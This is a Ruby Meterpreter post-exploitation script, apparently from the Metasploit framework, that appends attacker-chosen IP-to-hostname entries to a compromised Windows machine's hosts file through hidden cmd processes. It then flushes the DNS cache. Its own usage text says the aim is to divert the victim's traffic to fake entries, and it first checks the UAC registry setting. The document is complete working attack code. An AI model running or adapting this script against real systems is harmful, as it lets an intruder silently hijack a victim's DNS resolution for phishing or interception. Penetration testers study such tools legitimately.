# $Id$ # Meterpreter script for modifying the hosts file in windows # given a single entrie or several in a file and clear the # DNS cache on the target machine. # This script works with Windows 2000,Windows XP,Windows 2003, # Windows Vista and Windows 2008. # Provided: carlos_perez[at]darkoperator[dot]com # Version: 0.1.0 # Note: in Vista UAC must be disabled to be able to perform hosts # file modifications. ################## Variable Declarations ################## session = client # Setting Arguments @@exec_opts = Rex::Parser::Arguments.new( "-h" => [ false, "Help Options." ], "-e" => [ true, "Host entry in the format of IP,Hostname." ], "-l" => [ true, "Text file with list of entries in the format of IP,Hostname. One per line." ] ) def usage print_line("This Meterpreter script is for adding entries in to the Windows Hosts file.") print_line("Since Windows will check first the Hosts file instead of the configured DNS Server") print_line("it will assist in diverting traffic to the fake entry or entries. Either a single") print_line("entry can be provided or a series of entries provided a file with one per line.") print_line(@@exec_opts.usage) print_line("Example:\n\n") print_line("run hostsedit -e,google.com\n") print_line("run hostsedit -l /tmp/fakednsentries.txt\n\n") raise Rex::Script::Completed end record = "" #Set path to the hosts file hosts = session.fs.file.expand_path("%SYSTEMROOT%")+"\\System32\\drivers\\etc\\hosts" #Function check if UAC is enabled def checkuac(session) winver = session.sys.config.sysinfo if winver["OS"] =~ (/Windows 7|Vista/) print_status("Checking if UAC is enabled.") open_key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", KEY_READ) value = open_key.query_value("EnableLUA").data if value == 1 print_status("\tUAC is enabled") raise "Unable to continue UAC is enabbled." else print_status("\tUAC is disabled") status = false end end end #Function for adding record to hosts file def add2hosts(session,record,hosts) ip,host = record.split(",") print_status("Adding Record for Host #{host} with IP #{ip}") session.sys.process.execute("cmd /c echo #{ip}\t#{host} >> #{hosts}",nil, {'Hidden' => true}) end #Make a backup of the hosts file on the target def backuphosts(session,hosts) random = sprintf("%.5d",rand(100000)) print_status("Making Backup of the hosts file.") session.sys.process.execute("cmd /c copy #{hosts} #{hosts}#{random}.back",nil, {'Hidden' => true}) print_status("Backup loacated in #{hosts}#{random}.back") end # Clear DNS Cached entries def cleardnscach(session) print_status("Clearing the DNS Cache") session.sys.process.execute("cmd /c ipconfig /flushdns",nil, {'Hidden' => true}) end if client.platform =~ /win32|win64/ @@exec_opts.parse(args) { |opt, idx, val| case opt when "-e" checkuac(session) backuphosts(session,hosts) add2hosts(session,val,hosts) cleardnscach(session) when "-l" checkuac(session) if not ::File.exists?(val) raise "File #{val} does not exists!" else backuphosts(session,hosts) ::File.open(val, "r").each_line do |line| add2hosts(session,line.chomp,hosts) end cleardnscach(session) end when "-h" usage end } if args.length == 0 usage end else print_error("This version of Meterpreter is not supported with this Script!") raise Rex::Script::Completed end